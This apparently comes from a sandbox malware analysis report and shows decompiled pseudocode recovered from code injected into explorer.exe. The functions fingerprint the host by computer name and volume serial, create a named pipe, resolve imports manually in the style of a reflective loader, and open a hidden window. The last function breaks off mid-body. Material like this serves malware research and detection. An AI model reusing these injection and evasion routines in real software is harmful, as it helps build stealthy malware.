				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0xde688; // 0xf0000
					_t125 =  *0xde68c; // 0x14cfab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E000CBB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E000CB7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E000CB67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000C49C7( &_v1076,  &_v1076, _t206);
					_t141 = E000CD400( &_v1076, E000CC379( &_v1076), 0);
					E000CB88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E000C2C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000C92E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0xde688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000C91E3(_v1112);
								_t145 = _t130;
								 *0xde740 = _t76;
								 *0xde738 = E000C91E3(_t145);
								L17:
								_push(_t145);
								_t80 = E000C9B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0xdb9ca);
								E000C9F48(0xe); // executed
								E000C9F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E000CA0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E000CA3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E000CA3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E000C980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E000CA0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0xde688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E000CFC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0xde688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E000CE23E(_t183);
										}
										E000C52C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0xde688; // 0xf0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E000C109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000C85D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xf0228
									_t153 = _t51;
									L25:
									_t90 = E000C553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0xde688; // 0xf0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E000CC292(_v1104, __eflags);
							_v1112 = _t106;
							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0xde684; // 0x14cf8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E000C861A( &_v1116, _t192);
								_t145 = _t108;
								goto L17;
							}
							E000C861A( &_v1112, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E000CE286(_v1112, _t175); // executed
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000C95E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E000CBFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000C85D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E000C2BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x000c4a0b
0x000c4a18
0x000c4a23
0x000c4a28
0x000c4a2a
0x000c4a2d
0x000c4a32
0x000c4a35
0x000c4a3f
0x000c4a41
0x000c4a4e
0x000c4a57
0x000c4a57
0x000c4a64
0x000c4a7f
0x000c4a86
0x000c4a88
0x000c4a8d
0x000c4a92
0x000c4a98
0x000c4aa7
0x000c4ac6
0x000c4ac8
0x000c4ace
0x000c4ad4
0x000c4ad9
0x000c4add
0x000c4ae0
0x000c4aea
0x000c4aec
0x000c4aed
0x000c4af8
0x000c4afa
0x000c4afd
0x000c4b02
0x000c4b09
0x000c4b5e
0x000c4b5e
0x000c4b63
0x000c4bca
0x000c4bcf
0x000c4bd1
0x000c4bdb
0x000c4be0
0x000c4be0
0x000c4bf5
0x000c4bfa
0x000c4bfc
0x000c4bff
0x000c4c01
0x00000000
0x00000000
0x000c4c07
0x000c4c11
0x000c4c1a
0x000c4c1f
0x000c4c22
0x000c4c28
0x000c4c2e
0x000c4c36
0x000c4c38
0x000c4c3b
0x000c4c3c
0x000c4c41
0x000c4c44
0x000c4c47
0x000c4c49
0x000c4c4d
0x000c4c4d
0x000c4c52
0x000c4c55
0x000c4c57
0x000c4c5b
0x000c4c5b
0x000c4c62
0x000c4c67
0x000c4c69
0x000c4c6d
0x000c4c6f
0x000c4c75
0x000c4c79
0x000c4c7c
0x000c4c7d
0x000c4c82
0x000c4c85
0x000c4c8a
0x000c4cb2
0x000c4cb8
0x000c4cbf
0x000c4cce
0x000c4cd3
0x00000000
0x000c4cd3
0x000c4cc1
0x00000000
0x000c4c8c
0x000c4c8c
0x000c4c91
0x000c4c98
0x000c4cdd
0x000c4cdd
0x000c4ce4
0x000c4ce8
0x000c4ce9
0x000c4ce9
0x000c4cf3
0x000c4cf8
0x000c4cfb
0x000c4cfc
0x000c4cfe
0x000c4d00
0x000c4d05
0x000c4d0c
0x000c4d4f
0x000c4d0e
0x000c4d13
0x000c4d1b
0x000c4d1f
0x000c4d2a
0x000c4d35
0x000c4d3d
0x000c4d41
0x000c4d49
0x000c4d49
0x000c4d0c
0x000c4d55
0x000c4d58
0x000c4d5a
0x000c4d60
0x000c4d60
0x000c4d62
0x000c4d62
0x00000000
0x000c4d62
0x000c4c9a
0x000c4c9a
0x000c4ca0
0x000c4ca2
0x000c4ca7
0x000c4ca7
0x000c4ca9
0x000c4cd8
0x00000000
0x000c4cd8
0x000c4cab
0x000c4ae4
0x000c4ae4
0x00000000
0x000c4ae4
0x000c4c8a
0x000c4b69
0x000c4b77
0x000c4b8f
0x000c4b95
0x000c4b97
0x000c4baf
0x000c4bb4
0x000c4bbd
0x000c4bc3
0x00000000
0x000c4bc3
0x000c4b9f
0x000c4ba8
0x00000000
0x000c4ba8
0x000c4b0b
0x000c4b11
0x000c4b13
0x000c4b51
0x000c4b53
0x00000000
0x00000000
0x000c4b55
0x000c4b59
0x00000000
0x000c4b59
0x000c4b15
0x000c4b1f
0x000c4b2b
0x000c4b36
0x000c4b3d
0x000c4b47
0x000c4b4c
0x00000000
0x000c4b4c
0x000c4ae2
0x00000000
0x000c4a66
0x000c4a71
0x000c4a77
0x000c4a79
0x000c4d64
0x000c4d64
0x000c4d66
0x000c4d6c
0x000c4d6c
0x00000000
0x000c4a79

APIs

memset.MSVCRT ref: 000C4A2D
CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 000C4B8F
lstrcpyW.KERNEL32(00000000,00000000), ref: 000C4D1F
lstrcatW.KERNEL32 ref: 000C4D3D
lstrcatW.KERNEL32 ref: 000C4D41
lstrcatW.KERNEL32 ref: 000C4D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 000C4D4F

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$CreateNamedPipememset
String ID:
API String ID: 2307407751-0
Opcode ID: f646c9a26d67970c72acf10388bcd7f174072066b7c2bcfcece8def3effeadb6
Instruction ID: e00079e0afd43232e147177fe6b1363a575de2813d944f784ff1f94eb2fb20e0
Opcode Fuzzy Hash: f646c9a26d67970c72acf10388bcd7f174072066b7c2bcfcece8def3effeadb6
Instruction Fuzzy Hash: BE91AC71604300AFE754EB20D896FBE73E9BB84720F14492EF9558B2D2EB74DD048B52

Uniqueness

Uniqueness Score: -1.00%

Function 000CB7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E000CB7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000C95E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000C85D5( &_v16);
				_t33 = E000CC392(_t43);
				E000C9640( &(_t43[E000CC392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E000CC392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E000CD400(_t43, E000CC392(_t43) + _t40, 0);
			}

0x000cb7a8
0x000cb7b1
0x000cb7bd
0x000cb7c3
0x000cb7c5
0x000cb7cd
0x000cb7e0
0x000cb7ef
0x000cb7fa
0x000cb807
0x000cb821
0x000cb826
0x000cb828
0x000cb82f
0x000cb83f
0x000cb850
0x000cb85a
0x000cb862
0x000cb869
0x000cb86c
0x000cb889

APIs

memset.MSVCRT ref: 000CB7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 000CB7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 000CB7EF
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 000CB821

Part of subcall function 000C9640: _vsnwprintf.MSVCRT ref: 000C965D

lstrcatW.KERNEL32 ref: 000CB85A
CharUpperBuffW.USER32(?,00000000), ref: 000CB86C

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
Instruction ID: 2790561c89e92655b6e37f14f7a47cad77b00b55e4e119700a331dcc1739aec8
Opcode Fuzzy Hash: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
Instruction Fuzzy Hash: 302156B2901218BFE714ABA4DC8AFEE77BCDF54310F10856AF505D6182EE75AF048B64

Uniqueness

Uniqueness Score: -1.00%

Function 000CCF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E000CCF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0xde688; // 0xf0000
				GetCurrentProcess();
				_t11 = E000CBA05(); // executed
				_t1 = _t29 + 0x1644; // 0xf1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E000C8FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xf0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E000C8FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E000CE3B6(_t3);
				_t7 = _t29 + 0x220; // 0xf0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E000CE3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x000ccf87
0x000ccf89
0x000ccf90
0x000ccf98
0x000ccfa2
0x000ccfa2
0x000ccfa8
0x000ccfb1
0x000ccfb7
0x000ccfb9
0x000ccfbd
0x000ccfbd
0x000ccfc2
0x000ccfc8
0x000ccfd8
0x000ccfe2
0x000ccfea
0x000ccfed
0x000ccff9
0x000ccfff
0x000cd004
0x000cd00a
0x000cd010
0x000cd016
0x000cd01e

APIs

GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
memset.MSVCRT ref: 000CCFE2
GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
Instruction ID: 85beb0dd8ed8ae9ed765903e2ec244192ab05f814248cde92d819e8ab3455d73
Opcode Fuzzy Hash: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
Instruction Fuzzy Hash: B6019E709027009BE720AF71D84AFEABBE5EF80300F00082EF85683282EF746505CB64

Uniqueness

Uniqueness Score: -1.00%

Function 000D249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E000D249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E000CE099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x000d24a1
0x000d24a9
0x000d24be
0x000d24d0
0x000d24dc
0x000d24e2
0x000d24e7
0x000d24f3
0x000d265e
0x00000000
0x000d265e
0x000d24f9
0x000d2502
0x000d2510
0x000d2513
0x000d2522
0x000d2522
0x000d2529
0x000d2537
0x000d253a
0x000d2551
0x000d2557
0x000d255e
0x000d256e
0x000d2586
0x000d2570
0x000d2578
0x000d2578
0x000d2589
0x000d258d
0x000d2599
0x000d259d
0x000d25a1
0x000d25a5
0x000d25b1
0x000d25dc
0x000d25e4
0x000d25f6
0x000d2602
0x000d25b3
0x000d25b8
0x000d25c3
0x000d25cf
0x000d25cf
0x000d260b
0x000d2611
0x000d261b
0x000d2637
0x000d261d
0x000d262c
0x000d262c
0x000d261b
0x000d263f
0x000d2648
0x000d2648
0x000d2656
0x00000000
0x000d2656
0x000d2562
0x00000000
0x000d2562
0x00000000
0x000d253a
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000D24B8
LoadLibraryA.KERNEL32(00000000), ref: 000D2551

Strings

GetProcAddress, xrefs: 000D24C1
kernel32.dll, xrefs: 000D24B3

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
Instruction ID: deaac39a8f92dcb34ee975fe36824c3fd640916c06a8e948343ef26f76a1822f
Opcode Fuzzy Hash: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
Instruction Fuzzy Hash: BB619C75900209EFDB50CF98D885BADBBF1FF08315F24859AE815AB391C774AA80DF60

Uniqueness

Uniqueness Score: -1.00%

Function 000C2EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E000C2EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0xde684; // 0x14cf8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0xde688; // 0xf0000
				E000C902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E000C2E77;
				_push( &_v52);
				_t32 =  *0xde694; // 0x14cfa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0xde718; // 0x30094
					if(_t34 != 0) {
						_t39 =  *0xde694; // 0x14cfa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0xde694; // 0x14cfa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0xde718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0xde694; // 0x14cfa48
				 *((intOrPtr*)(_t47 + 0x18))( *0xde718);
				while(1) {
					_t50 =  *0xde694; // 0x14cfa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0xde694; // 0x14cfa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0xde694; // 0x14cfa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}

0x000c2ee3
0x000c2ef2
0x000c2ef9
0x000c2efe
0x000c2f18
0x000c2f20
0x000c2f2d
0x000c2f34
0x000c2f3a
0x000c2f41
0x000c2f42
0x000c2f47
0x000c2f50
0x000c2fcd
0x000c2fcd
0x000c2fd4
0x000c2fd7
0x000c2fdc
0x000c2fdc
0x000c2fdf
0x000c2fe7
0x000c2fec
0x000c2ff4
0x000c2ff4
0x000c2f77
0x000c2f7a
0x000c2f81
0x00000000
0x00000000
0x000c2f8a
0x000c2f8d
0x000c2f98
0x000c2fba
0x000c2fc1
0x000c2fc6
0x000c2fcb
0x00000000
0x00000000
0x000c2fa0
0x00000000
0x00000000
0x000c2fa6
0x000c2fab
0x000c2fb2
0x000c2fb7
0x000c2fb7
0x00000000

APIs

memset.MSVCRT ref: 000C2EF9
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 000C2F77
ShowWindow.USER32(00000000,00000000), ref: 000C2F8A

Strings

0, xrefs: 000C2F2D

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: Window$CreateShowmemset
String ID: 0
API String ID: 3027179219-4108050209
Opcode ID: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
Instruction ID: a9f914c0b4fadeb3d72a178da7fd84f66818822a173e8fe5a0fe974533a9003f
Opcode Fuzzy Hash: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
Instruction Fuzzy Hash: ED31F5B1501218AFF750EF68DC89FAA7BBCEB18344F00406AB909DB262D634DD058B71

Uniqueness

Uniqueness Score: -1.00%

Function 000C4D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E000C4D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0xde688; // 0xf0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E000CB7A8(0xdb9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E000CA86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E000CA471( &_v556, _t298);
					 *0xde748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E000CE1BC(0xdb9cc, _t299); // executed
						 *0xde680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000C95E1(0xdb9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0xde688; // 0xf0000
						_t127 = E000C92E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000C85D5( &_v612);
						_t130 = E000CB269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E000C861A( &_v616, 0xfffffffe);
						_t133 =  *0xde688; // 0xf0000
						_t22 = _t133 + 0x114; // 0xf0114
						E000C4A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0xde688; // 0xf0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0xde680; // 0x14cfda0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E000CE2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0xde6b4; // 0x14cfa98
